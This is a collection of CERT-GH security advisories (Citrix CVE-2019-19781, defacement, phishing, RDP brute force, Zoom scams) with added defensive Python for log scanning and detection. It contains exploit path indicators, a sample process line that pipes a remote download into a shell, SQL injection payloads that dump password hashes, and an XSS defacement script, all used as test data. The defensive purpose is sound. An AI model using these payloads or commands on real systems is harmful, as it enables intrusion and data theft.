
Alert Regarding Vulnerability (CVE-2019-19781) in Citrix Products
CERT-GH confirmed that information, including Proof-of-Concept code, about a vulnerability (CVE-2019-19781) in Citrix Application Delivery Controller (ADC) and Citrix Gateway has been made public. The flaw is a directory traversal in the appliance's web interface, and a remote attacker leveraging it may execute arbitrary code without authentication.
On January 12, 2020, Bad Packets released information about scanning activity that appeared to be leveraging the vulnerability.
Products affected by this vulnerability include:
- Citrix ADC and Citrix Gateway version 13.0
- Citrix ADC and NetScaler Gateway version 12.1
- Citrix ADC and NetScaler Gateway version 12.0
- Citrix ADC and NetScaler Gateway version 11.1
- Citrix NetScaler ADC and NetScaler Gateway version 10.5
- Citrix SD-WAN WANOP software and appliance model 4000
- Citrix SD-WAN WANOP software and appliance model 4100
- Citrix SD-WAN WANOP software and appliance model 5000
- Citrix SD-WAN WANOP software and appliance model 5100
The method for confirming whether this vulnerability has been exploited on a device is as follows:
- Check whether there is any access to the device from a suspicious IP address. HTTP traffic to the device is recorded in httpaccess.log and httperror.log.
- Check whether traffic that exploits the vulnerability is recorded in the device log. If the Proof-of-Concept code that exploits this vulnerability is executed, requests containing the following strings are recorded on the device (the "../" may appear percent-encoded in the raw log, so decode request paths before searching):
/vpns/
/vpn/../vpns/cfg/smb.conf
/vpn/../vpns/portal/scripts/newbm.pl
/vpn/../vpns/portal/backdoor.xml
/vpns/portal/scripts/newbm.pl
- Check the files under the following directories on the device:
/var/tmp/netscaler/portal/templates
/netscaler/portal/templates
If there is a recently created, unknown XML file, it is a malicious file created by an attacker, and it is possible that an attack has already been conducted to compromise the device.
- Check device processes and cron jobs. Execute commands on the device to check whether any process or cron job is running as the user "nobody". If this vulnerability is exploited, the attacker's commands are executed as "nobody"; if such processes or cron jobs are present, it is possible that an attack has already been conducted to compromise the device.
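The checks above can be scripted. The following Python is an added example written for this page, not CERT-GH's or Citrix's code: it parses httpaccess.log lines in the common log format (a constructed sample is embedded), decodes percent-encoded paths before matching the indicator strings, lists recently created XML files in the two template directories, and filters `ps aux` output for processes owned by nobody. The log location /var/log/httpaccess.log and the sample process listing are assumptions.

```python
"""Triage helpers for the CVE-2019-19781 checklist above (added example, not CERT-GH code)."""
import os
import re
import time
from urllib.parse import unquote

# Request-path fragments from the checklist. The public PoC traverses from /vpn/
# into /vpns/; attackers often percent-encode the "../", so the decoded path is matched.
IOC_PATTERNS = [re.compile(p) for p in (
    r"/vpn/\.\./vpns/",
    r"/vpns/portal/scripts/newbm\.pl",
    r"/vpns/cfg/smb\.conf",
    r"/vpns/portal/backdoor\.xml",
)]

# Common log format as written to httpaccess.log:
# client ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample of httpaccess.log; addresses, times and paths are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Jan/2020:08:14:02 +0000] "GET /vpn/index.html HTTP/1.1" 200 5120
198.51.100.23 - - [12/Jan/2020:03:41:17 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83
198.51.100.23 - - [12/Jan/2020:03:41:19 +0000] "POST /vpn/%2e%2e/vpns/portal/scripts/newbm.pl HTTP/1.1" 200 0
198.51.100.23 - - [12/Jan/2020:03:41:21 +0000] "GET /vpn/../vpns/portal/x7a9.xml HTTP/1.1" 200 1024
203.0.113.7 - - [12/Jan/2020:09:02:44 +0000] "GET /logon/LogonPoint/index.html HTTP/1.1" 200 9877
""".splitlines()

# Constructed `ps aux` output in the FreeBSD column layout (assumed for the appliance).
SAMPLE_PS = """\
USER     PID %CPU %MEM   VSZ  RSS TT  STAT STARTED    TIME COMMAND
root       1  0.0  0.0  3000  500 -   Ss   Sat02AM 0:01.00 /sbin/init
nobody  4711  0.0  0.1  9000 1200 -   S    Sun03AM 0:00.02 /bin/sh -c curl http://198.51.100.23/x | sh
""".splitlines()


def scan_access_log(lines):
    """Return one hit per request whose decoded path matches an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote(m["path"])  # undo %2e%2e and friends before matching
        for pat in IOC_PATTERNS:
            if pat.search(path):
                hits.append({"ip": m["ip"], "time": m["time"], "method": m["method"],
                             "path": path, "status": int(m["status"]), "ioc": pat.pattern})
                break
    return hits


def attacker_ips(hits):
    """Distinct source addresses seen sending exploit traffic."""
    return sorted({h["ip"] for h in hits})


def recent_xml(entries, now, max_age_days=30):
    """entries: iterable of (filename, mtime_epoch); returns *.xml names newer than the cutoff."""
    cutoff = now - max_age_days * 86400
    return sorted(n for n, mtime in entries if n.lower().endswith(".xml") and mtime >= cutoff)


def scan_template_dir(directory, max_age_days=30):
    """recent_xml over a real directory; a missing directory yields an empty list."""
    try:
        entries = [(e.name, e.stat().st_mtime) for e in os.scandir(directory) if e.is_file()]
    except FileNotFoundError:
        return []
    return recent_xml(entries, time.time(), max_age_days)


def nobody_processes(ps_lines):
    """Command lines of processes owned by 'nobody' in `ps aux` output.
    Review each one: shells, curl/wget and cron-launched commands are the give-aways."""
    found = []
    for line in ps_lines:
        fields = line.split(None, 10)  # USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
        if len(fields) == 11 and fields[0] == "nobody":
            found.append(fields[10])
    return found


def main():
    log = "/var/log/httpaccess.log"  # assumed location on the appliance
    if os.path.exists(log):
        with open(log, errors="replace") as f:
            lines = f.read().splitlines()
    else:
        lines = SAMPLE_LOG
    hits = scan_access_log(lines)
    for h in hits:
        print(f"[ioc] {h['time']} {h['ip']} {h['method']} {h['path']} -> {h['status']}")
    print("[ioc] sources:", ", ".join(attacker_ips(hits)))
    for d in ("/var/tmp/netscaler/portal/templates", "/netscaler/portal/templates"):
        for name in scan_template_dir(d):
            print(f"[xml] recently created template file: {d}/{name}")
    for cmd in nobody_processes(SAMPLE_PS):
        print("[proc] running as nobody:", cmd)
    print("[cron] also check: crontab -l -u nobody")


if __name__ == "__main__":
    main()
```

Run it on the appliance shell with the real log path; the sample data only exercises the logic. Matching the decoded path rather than the raw line is the one detail that matters in practice, because a raw grep for `/../` misses the percent-encoded form the scanners send.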
You can also download and run the citrix-vuln-checker.py script from your terminal to check whether your Citrix server is vulnerable to CVE-2019-19781: https://github.com/inveteck/citrix-vuln-checker
References
Inveteck Global, citrix-vuln-checker: https://github.com/inveteck/citrix-vuln-checker
As of January 17, 2020, Citrix had not provided a fix for this vulnerability. Please consider applying the mitigation described below, or discontinue use of the affected products until fixed versions are available.
Citrix planned to provide versions addressing the vulnerability on the following dates:
January 24, 2020
- Citrix NetScaler ADC and NetScaler Gateway version 10.5
On January 24, Citrix released the version 10.5 build of Citrix NetScaler ADC and NetScaler Gateway that addresses this vulnerability. Since attacks leveraging the vulnerability are still being observed, we recommend applying the fix and checking whether the system has already been compromised (see the checks above) as soon as possible.
Mitigation
Please consider applying the following mitigations:
- Restrict unnecessary traffic to the device with a firewall, etc.
- Apply the workarounds provided by Citrix:
Citrix Systems, Mitigation Steps for CVE-2019-19781: https://support.citrix.com/article/CTX267679
According to Citrix, the mitigation settings are not applied on Citrix ADC version 12.1 builds 51.16 and 51.19, and on builds prior to 50.31, because of a bug in those builds. It is recommended to update to a build that is not affected by this bug in order to apply the mitigation properly.
Guidance on Defending Against Video Teleconferencing (VTC) Hijacking and Zoom-bombing
The Federal Bureau of Investigation (FBI) has released an article on defending against video-teleconferencing (VTC) hijacking (referred to as “Zoom-bombing” when the attacks target the Zoom VTC platform). Many organizations and individuals are increasingly dependent on VTC platforms, such as Zoom and Microsoft Teams, to stay connected during the Coronavirus Disease 2019 (COVID-19) pandemic. The FBI released this guidance in response to an increase in reports of VTC hijacking.
The National Cyber Security Centre encourages users and administrators to review the FBI article (linked in the reference below) as well as the following steps to improve VTC cybersecurity:
- Ensure meetings are private, either by requiring a password for entry or by controlling guest access from a waiting room.
- Consider security requirements when selecting vendors. For example, if end-to-end encryption is necessary, does the vendor offer it?
- Ensure VTC software is up to date. See Understanding Patches and Software Updates.
Reference
US-CERT/CISA, FBI Releases Guidance on Defending Against VTC Hijacking and Zoom-bombing: https://www.us-cert.gov/ncas/current-activity/2020/04/02/fbi-releases-guidance-defending-against-vtc-hijacking-and-zoom
Stopping your smartphone or tablet being hacked at an airport, hotel or café
If you use public Wi-Fi or USB power charging stations at airports, hotels and other locations, make sure to use a VPN when on public Wi-Fi, and always use a USB data blocker (also known as a “USB condom”) when using public USB charging stations.
While the risk from public USB charging stations at airports, hotels and other locations may be minimal, a USB port is a data gateway into a device, and giving an unknown charging station access to your device's data lines is a bad idea.
A USB data blocker passes only the power lines and blocks all data transfer. Its built-in chip detects the type of device connected and switches between the Apple, Universal and Samsung charging specifications, so the device still charges at the fastest rate possible.
Website Defacement
CERT-GH of the National Cyber Security Centre provides the following advisory.
This is to advise all web host users, managers and business owners in Ghana of cases of website defacement identified by CERT-GH.
Website defacement is an attack on a website that changes the visual appearance of the site or a web page. It is similar to drawing graffiti on a wall, only it happens virtually, as a kind of electronic graffiti, and is a form of vandalism. Defacements are typically the work of hackers who break into a web server and replace the content of the hosted website with content of their own. Attackers have different motivations when they deface a website. Political motivation is one: defacement is often used to spread messages by “cyber protesters” or hacktivists. Other attackers deface a website for fun, to mock site owners by finding and exploiting vulnerabilities in the site. In both cases, website owners face damage to their business and reputation once their sites are defaced.
Consequences of website defacement vary. Here are some consequences an organization may face after its website has been attacked.
- Potential Data breach: Due to the noticeable nature of web defacement, some hackers use them as a form of diversion. With everyone’s attention focused on the defacement, these hackers can then carry out more sinister activities without getting detected immediately. For instance, they could steal sensitive information, install malware, and perform privilege escalation or carry out other nefarious acts.
- Losing Customers: Visitors may be redirected to sites teeming with malicious code. They might be prompted to download malware onto their system or it downloads itself, undetected. In such cases, your regular and new visitors may be concerned about visiting your page in the future and you can potentially lose customers.
- Impact on PageRank and Traffic: Search engines rank your website according to a number of factors. A higher ranking website comes up first in the results of a search query. If your defaced website is flagged or identified as causing harm to its users, a search engine such as Google might add you to its blacklist. This means that you can lose up to 95% of website traffic that could be gained from Google search results.
- Effect on Brand Image: Internet users worry about safety during their online experiences. If they notice you have failed to establish security measures on your website, they automatically conclude that you are either completely negligent in securing your website or extremely ignorant of information security challenges and threats. Such conclusions can be devastating for your organization's image.
Here are measures that prevent defacement or limit its impact:
- Security audits and penetration testing: Unpatched systems are a prime target for hackers because they are susceptible to known vulnerabilities. Unnecessary open ports are another common weakness, as they expose services that may be reachable without authentication and may allow remote execution of malicious code. Regular security audits help evaluate the security posture of an IT infrastructure (operating systems, service and application flaws, improper configurations, or risky end-user behaviour) and better protect the systems hosting the website.
- Defend yourself against SQL injection attacks: SQL injection attacks insert SQL fragments into data entry fields in order to alter the execution of the application's predefined SQL statements. With the modified statements, attackers have extracted sensitive information, obtained the authentication details of registered users and corrupted databases, making websites unusable. To defend against SQL injection, use parameterized (prepared) statements, which send user input to the database separately from the SQL so that it is only ever treated as data, never as part of the query. Escaping input so that special characters are treated as part of the string rather than the end of it is a weaker fallback for cases where parameterization is not possible.
- Defend yourself against Cross-site Scripting (XSS) attacks: Cross-site scripting is when an attacker injects script into a web page, for example through a form field, so that it runs in other users' browsers. The browser trusts the script because it appears to come from the trusted website. Each time an end user accesses the affected page, their browser downloads and runs the malicious script as if it were part of the page. To defend against XSS, validate input and, above all, encode output: HTML-escape untrusted data wherever it is written into a page, so the browser renders it as text instead of executing it.
- Use defacement monitoring and detection tools: Web attacks leave companies little time to react and perform damage control after an incident. Defacement monitoring and detection tools are one of the best ways to detect a defacement or any unauthorized integrity change to a website. Some of the most used monitoring and detection tools are Banff Cyber's WebOrion Defacement Monitor, Site24x7 and Nagios. Careful evaluation and configuration of the tool to detect both full and partial defacements, covering the HTML as well as linked images, scripts and stylesheets, is important to ensure an effective tool is in place.
- Prepare to respond to defacement incidents: What do we do when our website is defaced? A good detection tool only tells you when your website is defaced, not what action to take. It is therefore important to put a set of incident response procedures in place and to ensure that you have the right personnel to respond to a web defacement. The technical response team will likely involve the security manager, web masters/web developers and the web server team. It may also be important to have corporate communications prepare a public message to preserve the company's reputation, and to have a maintenance web page ready to inform customers. Make an action plan for the restoration process that will shorten the time to recovery.
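An added example (not part of the CERT-GH advisory) showing the two flaws above side by side with their fixes, using Python's built-in sqlite3 module and html.escape. The users table, the login lookup, the comment rendering and the payloads are all constructed for illustration.

```python
"""SQL injection and XSS: vulnerable code beside its fix (added example, not from the advisory)."""
import html
import sqlite3


def make_db():
    """In-memory users table with one constructed account (the hash value is a placeholder)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, is_admin INTEGER)")
    db.execute("INSERT INTO users VALUES ('alice', 'hash-of-alice-password', 1)")
    return db


def find_user_vulnerable(db, username):
    """User input pasted into the SQL text: the input can change the statement itself."""
    sql = f"SELECT username, is_admin FROM users WHERE username = '{username}'"
    return db.execute(sql).fetchall()


def find_user_safe(db, username):
    """Parameterised statement: the value travels separately from the SQL and is only ever data."""
    return db.execute("SELECT username, is_admin FROM users WHERE username = ?", (username,)).fetchall()


def demo_sql_injection(username):
    """Run the same input through both lookups; returns (vulnerable_rows, safe_rows)."""
    db = make_db()
    return find_user_vulnerable(db, username), find_user_safe(db, username)


# Two constructed payloads: a tautology that matches every row, and a UNION that
# pulls password hashes out through the same query.
TAUTOLOGY = "x' OR '1'='1"
UNION_DUMP = "x' UNION SELECT password_hash, 0 FROM users--"


def render_comment_vulnerable(comment):
    """Untrusted text written straight into the page: a <script> in it runs for every visitor."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment):
    """HTML-escape at the point of output so the browser renders the text instead of executing it.
    html.escape is right for element content and quoted attribute values; JavaScript or URL
    contexts need their own encoders."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


# Constructed XSS payload of the kind used for a partial defacement.
DEFACE_SCRIPT = '<script>document.body.innerHTML="<h1>Hacked</h1>"</script>'


if __name__ == "__main__":
    for payload in ("alice", TAUTOLOGY, UNION_DUMP):
        vuln, safe = demo_sql_injection(payload)
        print(f"input {payload!r}: vulnerable -> {vuln}, parameterised -> {safe}")
    print(render_comment_vulnerable(DEFACE_SCRIPT))
    print(render_comment_safe(DEFACE_SCRIPT))
```

The parameterised lookup returns nothing for both payloads because the whole string is compared against the username column; the vulnerable one returns every account for the tautology and the stored hash for the UNION.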
Here are general minimal tips and advice from CERT-GH as precautionary steps:
- Do not click on email attachments or links provided in emails, on social media platforms or on websites that you are not familiar with.
- Apply security updates and patches and stay up to date with the latest system versions.
- Report incidents to CERT-GH at report@cybersecurity.gov.gh
- Share this advisory and the precautionary steps among users in your organization and communities for awareness purposes.
Best Advice:
Website defacement can result in damage to a site’s reputation, loss of valuable information and user privacy, loss of money and loss of time. It is therefore expedient to put mitigation and prevention techniques in place. To conclude, keep these tips:
- Keep software up to date
- Watch out for SQL injection
- Protect against XSS attacks
- Beware of error messages
- Validate on both the browser and the server side
- Check your passwords
- Avoid file uploads by users
- Use HTTPS
- Get website security tools
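As an added example of the integrity monitoring the advisory recommends (it is not code from any of the named tools), the following Python takes a baseline of a page and its linked scripts, stylesheets and images, then reports what changed. It uses a constructed in-memory site in place of HTTP fetches; in production the fetch function would perform the GET. The point it makes is that hashing only the HTML misses a partial defacement delivered through a linked script.

```python
"""Defacement monitor: baseline and compare a page plus its linked resources (added example)."""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin


class _LinkCollector(HTMLParser):
    """Collect the URLs of scripts, stylesheets and images referenced by a page."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "img") and a.get("src"):
            self.links.append(a["src"])
        elif tag == "link" and a.get("href") and "stylesheet" in (a.get("rel") or "").lower():
            self.links.append(a["href"])


def _sha256(data):
    return hashlib.sha256(data).hexdigest()


def snapshot(page_url, fetch):
    """Return {url: sha256 or None} for the page and every linked resource.
    fetch(url) -> bytes. In production it performs the HTTP GET; here it is a dict lookup,
    and a KeyError stands in for an unreachable resource."""
    page = fetch(page_url)
    collector = _LinkCollector()
    collector.feed(page.decode("utf-8", "replace"))
    hashes = {page_url: _sha256(page)}
    for link in collector.links:
        url = urljoin(page_url, link)
        try:
            hashes[url] = _sha256(fetch(url))
        except KeyError:
            hashes[url] = None
    return hashes


def compare(baseline, current):
    """List (url, status) for every difference: modified, added, removed or unreachable."""
    changes = []
    for url in sorted(set(baseline) | set(current)):
        if url not in current:
            changes.append((url, "removed"))
        elif url not in baseline:
            changes.append((url, "added"))
        elif current[url] is None:
            changes.append((url, "unreachable"))
        elif baseline[url] != current[url]:
            changes.append((url, "modified"))
    return changes


def check(page_url, baseline, fetch):
    """Take a fresh snapshot and diff it against the stored baseline."""
    return compare(baseline, snapshot(page_url, fetch))


# Constructed site: example.com is a placeholder host, the bytes are made up.
PAGE = "https://www.example.com/"
SITE_BEFORE = {
    PAGE: (b'<html><head><link rel="stylesheet" href="/css/site.css">'
           b'<script src="/js/app.js"></script></head>'
           b'<body><img src="/img/logo.png"><h1>Welcome</h1></body></html>'),
    PAGE + "css/site.css": b"body{color:#222}",
    PAGE + "js/app.js": b"console.log('app');",
    PAGE + "img/logo.png": b"\x89PNG-constructed-bytes",
}
# Partial defacement: the HTML is untouched, only the linked script was replaced.
SITE_AFTER = dict(SITE_BEFORE)
SITE_AFTER[PAGE + "js/app.js"] = b"document.body.innerHTML='<h1>HACKED</h1>';"
# A resource that no longer loads.
SITE_MISSING_CSS = {k: v for k, v in SITE_BEFORE.items() if not k.endswith("site.css")}

if __name__ == "__main__":
    baseline = snapshot(PAGE, SITE_BEFORE.__getitem__)  # store this after a verified-clean deploy
    print("no change:", check(PAGE, baseline, SITE_BEFORE.__getitem__))
    print("defaced:  ", check(PAGE, baseline, SITE_AFTER.__getitem__))
    print("broken:   ", check(PAGE, baseline, SITE_MISSING_CSS.__getitem__))
```

Re-baseline only after a deliberate, verified deployment; otherwise an attacker who defaces the site just before a scheduled re-baseline gets their changes accepted as normal.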
How to Recognize and Avoid Phishing Scams
Scammers use email or text messages to trick you into giving them your personal information. They may try to steal your passwords, account numbers, or Social Security numbers. If they get that information, they could gain access to your email, bank, or other accounts. Scammers launch thousands of phishing attacks every day and they’re often successful. But there are several things you can do to protect yourself.
Scammers use familiar company names or pretend to be someone you know. They ask you to click on a link or give passwords or bank account numbers. If you click on the link, they can install programs that lock you out of your computer and can steal your personal information. They pressure you to act now – or something bad will happen.
Check it out.
Look up the website or phone number for the company or person who is contacting you. Call that company or person directly, using a number you know to be correct, not the number in the email or text. Tell them about the message you got.
Look for scam tip-offs.
- You don't have an account with the company.
- The message is missing your name or uses bad grammar and spelling.
- The person asks for personal information, including passwords.
- Hover your cursor over the link you have been asked to click (without clicking) to see the web address it really points to, and compare it with the company's real domain.
But note: some phishing schemes are sophisticated and look very real, so check it out and protect yourself.
Keep your computer security up to date by installing antivirus software, updating it regularly and backing up your data often.
Consider multi-factor authentication, a second step to verify who you are, such as a text message with a code, for accounts that support it.
Change any compromised passwords right away and don't reuse them for any other accounts.
Advisory On RDP Brute Force Attacks
One way for employees to access corporate devices is Remote Desktop Protocol (RDP). Remote Desktop is a remote management tool which allows you to connect to a computer and take over its desktop: it is as if you were sitting in front of that computer, only remotely. It is heavily used during the current pandemic by those who have moved to working from home. If poorly configured, it is vulnerable to attack.
Risks:
- RDP services are exposed directly to the internet.
- RDP ports and services are being used as the initial attack vector in ransomware attacks.
- Brute-force attacks against RDP have been increasing.
- After successfully guessing credentials, attackers get full access to corporate IT resources.
- Leakage of sensitive information.
- Spread of malware infections.
Recommendations:
- Use strong and complex passwords on RDP servers.
- Connect remote devices through the corporate VPN rather than exposing RDP to the internet.
- Use two-factor authentication where possible.
- Disable RDP (TCP port 3389) when not in use.
- Enable account lockout policies to block brute-force attacks after a number of failed login attempts.
- Enable account audit policies so that failed logins are logged and can be reviewed.
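The last two recommendations only help if someone looks at the failed-logon events. As an added example (not from the referenced article), the following Python reads a CSV export of Windows Security events 4625 (failed logon) and 4624 (successful logon), keeps only RDP logon types (10, and 3 when Network Level Authentication is in use), and raises an alert when one source IP reaches five failures within ten minutes; it also records whether that IP later logged on successfully, which is the sign that the brute force worked. The event rows, addresses and account names are constructed.

```python
"""RDP brute-force detection over Windows Security events (added example, not from the article)."""
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Logon types an RDP attempt can produce: 10 = RemoteInteractive; with Network
# Level Authentication enabled, failed attempts are logged as type 3 (network).
RDP_LOGON_TYPES = {3, 10}
FAILED, SUCCESS = 4625, 4624

# Constructed CSV export of the Security log (columns as you would export from
# Get-WinEvent or Event Viewer; every value is invented for this example).
SAMPLE_CSV = """\
TimeCreated,Id,TargetUserName,LogonType,IpAddress
2020-04-20T02:00:01,4625,Administrator,10,198.51.100.9
2020-04-20T02:00:03,4625,Administrator,10,198.51.100.9
2020-04-20T02:00:05,4625,admin,10,198.51.100.9
2020-04-20T02:00:07,4625,backup,3,198.51.100.9
2020-04-20T02:00:09,4625,jdoe,3,198.51.100.9
2020-04-20T02:00:12,4624,jdoe,10,198.51.100.9
2020-04-20T09:15:00,4625,jdoe,10,203.0.113.50
2020-04-20T09:15:20,4624,jdoe,10,203.0.113.50
"""


def parse_events(csv_text):
    """Parse the export into dicts sorted by time."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        events.append({
            "time": datetime.fromisoformat(row["TimeCreated"]),
            "id": int(row["Id"]),
            "user": row["TargetUserName"].lower(),
            "type": int(row["LogonType"]),
            "ip": row["IpAddress"],
        })
    return sorted(events, key=lambda e: e["time"])


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """One alert per source IP that reaches `threshold` RDP failures inside `window`.
    The alert records the peak failure count in a window, the accounts tried (many
    distinct names = password spray) and the first successful logon from that IP
    afterwards, if any."""
    recent = defaultdict(deque)  # ip -> failures inside the sliding window
    alerts = {}
    for e in events:
        if e["type"] not in RDP_LOGON_TYPES:
            continue
        ip = e["ip"]
        if e["id"] == FAILED:
            q = recent[ip]
            q.append(e)
            while q and e["time"] - q[0]["time"] > window:
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"ip": ip, "first": q[0]["time"], "failures": 0,
                                           "users": set(), "success_after": None})
                a["last"] = e["time"]
                a["failures"] = max(a["failures"], len(q))
                a["users"].update(x["user"] for x in q)
        elif e["id"] == SUCCESS and ip in alerts and alerts[ip]["success_after"] is None:
            alerts[ip]["success_after"] = (e["time"], e["user"])
    for a in alerts.values():
        a["users"] = sorted(a["users"])
        a["kind"] = "password spray" if len(a["users"]) >= 3 else "brute force"
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_bruteforce(parse_events(SAMPLE_CSV)):
        print(f"{a['kind']} from {a['ip']}: {a['failures']} failures {a['first']}..{a['last']}, "
              f"accounts {a['users']}, success afterwards: {a['success_after']}")
```

In the sample, the single failed attempt from 203.0.113.50 followed by a success is a normal typo and produces no alert; the burst from 198.51.100.9 across four accounts followed by a success for jdoe is exactly the sequence the advisory describes as leading to full access.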
References
https://www.bleepingcomputer.com/news/security/rdp-brute-force-attacks-are-skyrocketing-due-to-remote-working/
Zoom Phishing Attacks
Individuals and businesses have become increasingly reliant on video conferencing to stay connected while working from home during the Covid-19 outbreak. Organizations have adapted by holding online meetings and webinars on platforms such as Cisco WebEx, Microsoft Teams, Slack and Zoom. Attackers are taking advantage of this with phishing emails that impersonate Zoom.
Background
- Out of the blue, you receive an email, text or social media message that includes Zoom's logo and a message saying something like “Your Zoom account has been suspended. Click here to reactivate.” or “You missed a meeting, click here to see the details and reschedule”.
- You might even receive a message welcoming you to the platform and requesting that you click on a link to activate your account.
Observed campaigns
- Emails with the subject line “Zoom Account” that include a welcome message for new users. Users are persuaded to click on a link to activate their Zoom account by entering their login credentials on a fake website controlled by cyber criminals.
- Emails with the subject line “Missed Zoom Meeting” informing users that they missed a meeting. The message includes a link “Check your missed conference”, which takes users to a fake website where they are asked to log in and their credentials are harvested.
- Emails with the subject line “Meeting Canceled – Could we do a Zoom call” target manufacturing, energy, IT, construction, marketing, technology and other industrial firms with malware rather than credential phishing. The attackers try to gain access to computer files, personal information such as usernames and passwords, and credit card details.
- Emails that provoke a sense of urgency and panic, encouraging recipients to click on malicious links.
Recommendations
- Double-check the sender's information. zoom.us and zoom.com are the only official domains for Zoom. If an email comes from a similar-looking domain that doesn't quite match the official domain name, it's probably a scam. Look out for spoofed domains that sound like the real domain when read, such as zooom.us.
- Never click on links in unsolicited emails. Phishing scams rely on getting an unsuspecting individual to click on a link or open a file that downloads malware onto their computer or leads to a credential-harvesting page. If you get an unsolicited email and you aren't sure who it really came from, never click on any links, files or images it may contain.
- Resolve issues directly. If you receive an email stating there is a problem with your account and you aren't sure whether it is legitimate, contact the company directly: go to the official website by typing the address into your browser and use its “Contact Support” feature to get help.
- Pay close attention to the spelling of an email or web page; if there are inconsistencies, be cautious.
- Take care when opening unrecognized emails. Emails from unknown people must be verified by checking whether the sender is someone you know. Do not reply to or forward emails from unknown people.
- Refrain from downloading files or clicking links in emails from unknown senders and in any correspondence you were not expecting. Always check the sender's details and the embedded URL by hovering (not clicking) your mouse over the sender's email address and any links included.
- Use strong and unique passwords for every account, and never reuse a password. Using a password manager that can generate robust passwords is recommended.
- Ensure that all programs and the operating system (OS) installed on your device are updated with the latest security patches.
- Use multi-factor authentication to help secure your account.
- Establish a meeting's validity by personally communicating with the sender and asking whether the invitation is genuine.
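The hover-and-check advice above is where lookalike domains trip people up. The following Python is an added example, not Zoom's or CERT-GH's code: it extracts the host a browser would actually connect to from a link and tests it against the two official domains, then explains which trick a fake uses (official name as a subdomain, user-info before an @, official name only in the path, or a one-character typo such as zooom.us). The sample links are constructed and evil-example.com is a placeholder host.

```python
"""Lookalike-domain check for links in Zoom-themed emails (added example, not Zoom's or CERT-GH's code)."""
from urllib.parse import urlsplit

# The two official domains named in the advisory. Real meeting links live on
# subdomains such as us04web.zoom.us, so a host is accepted when it equals one
# of these or ends in "." followed by one of these.
OFFICIAL_DOMAINS = ("zoom.us", "zoom.com")


def link_host(url):
    """Host a browser would actually connect to for url, lower-cased, or None if not http(s).
    urlsplit drops user-info ("zoom.us@evil..." -> "evil...") and the path, which is where
    most lookalike tricks hide."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() not in ("http", "https") or not parts.hostname:
        return None
    return parts.hostname.lower().rstrip(".")


def is_official_zoom_link(url):
    host = link_host(url)
    return host is not None and any(host == d or host.endswith("." + d) for d in OFFICIAL_DOMAINS)


def _edit_distance(a, b):
    """Levenshtein distance, used to spot one-character typo-squats such as zooom.us."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def why_suspicious(url):
    """None for an official link, otherwise a short description of the trick being used."""
    if is_official_zoom_link(url):
        return None
    host = link_host(url)
    if host is None:
        return "not an http(s) link"
    parts = urlsplit(url.strip().lower())
    if "@" in parts.netloc:
        return f"user-info trick: the browser connects to {host}, not to what precedes the @"
    if any(host.startswith(d + ".") for d in OFFICIAL_DOMAINS):
        return f"official name used as a subdomain of an attacker host: {host}"
    if any(d in parts.path + parts.query and d not in host for d in OFFICIAL_DOMAINS):
        return f"official name appears only in the path or query; the host is {host}"
    for d in OFFICIAL_DOMAINS:
        if _edit_distance(host, d) == 1:
            return f"typo-squat of {d}: {host}"
    return f"unrecognised host: {host}"


# Constructed links of the kinds seen in the campaigns described above.
SAMPLE_LINKS = [
    "https://us04web.zoom.us/j/123456789",
    "https://zoom.us.evil-example.com/activate",
    "https://zoom.us@evil-example.com/login",
    "https://evil-example.com/zoom.us/missed",
    "http://zooom.us/activate",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        verdict = why_suspicious(link)
        print(f"{'OK      ' if verdict is None else 'SUSPECT '} {link}  {verdict or ''}")
```

The check deliberately looks at the host the browser resolves, not at whether the string "zoom.us" appears anywhere in the link; that is the difference between reading the address bar and reading the bait.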